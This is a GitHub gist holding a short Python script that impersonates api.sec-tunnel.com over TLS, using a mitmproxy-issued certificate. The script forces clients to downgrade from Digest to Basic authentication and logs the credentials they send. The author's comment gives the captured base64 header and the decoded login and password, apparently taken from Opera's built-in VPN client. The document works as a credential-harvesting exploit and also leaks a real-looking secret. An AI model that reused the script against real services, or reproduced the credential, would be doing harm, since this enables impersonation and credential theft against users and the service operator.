Skip to content

Instantly share code, notes, and snippets.

@Snawoot

Snawoot/downgrade-digest.py

Last active March 22, 2021 14:01
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Snawoot/dd5fcb8f7b0df0057b2fefe5cbc1a50c to your computer and use it in GitHub Desktop.
Save Snawoot/dd5fcb8f7b0df0057b2fefe5cbc1a50c to your computer and use it in GitHub Desktop.
Download ZIP
Raw
downgrade-digest.py
#!/usr/bin/env python3
import ssl
import http.server
import socketserver
from http import HTTPStatus
class Handler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
self.send_response(HTTPStatus.UNAUTHORIZED)
self.send_header('WWW-Authenticate', 'Basic realm="ApiDigest"')
self.end_headers()
print("auth=%s" % self.headers['Authorization'])
self.wfile.write(b'Unauthorized')
do_POST = do_GET
class MyTCPServer(socketserver.TCPServer):
allow_reuse_address = True
httpd = MyTCPServer(('', 8000), Handler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile='/home/user/mitmproxy-ca/api.sec-tunnel.com.pem', keyfile='/home/user/mitmproxy-ca/api.sec-tunnel.com.key', server_side=True)
httpd.serve_forever()
@Snawoot
Copy link
Author

Snawoot commented Mar 22, 2021

Result is:

auth=Basic c2UwMzE2OlNJTHJNRVBCbUp1aG9teFdrZm0zSmFscUhYMkVoZWcxWWhsRVppTWg4SUk=

which translates to login:password

se0316:SILrMEPBmJuhomxWkfm3JalqHX2Eheg1YhlEZiMh8II

as observed on Opera 74.0.3911.232 @ Win10

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment